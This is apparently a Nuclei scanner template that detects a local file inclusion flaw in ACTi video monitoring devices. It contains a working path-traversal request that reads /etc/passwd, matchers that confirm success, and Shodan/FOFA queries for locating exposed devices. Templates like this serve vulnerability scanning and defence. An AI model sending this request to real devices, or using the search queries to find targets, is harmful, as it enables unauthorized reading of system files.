id: acti-video-lfi info: name: ACTi-Video Monitoring - Local File Inclusion author: DhiyaneshDk severity: high description: | ACTI video surveillance has loopholes in reading any files reference: - https://www.cnblogs.com/hmesed/p/16292252.html metadata: verified: true max-request: 1 shodan-query: title:"Web Configurator" fofa-query: app="ACTi-视频监控" tags: acti,lfi,iot,video,monitoring http: - method: GET path: - "{{BaseURL}}/images/../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/octet-stream" - type: status status: - 200 # digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950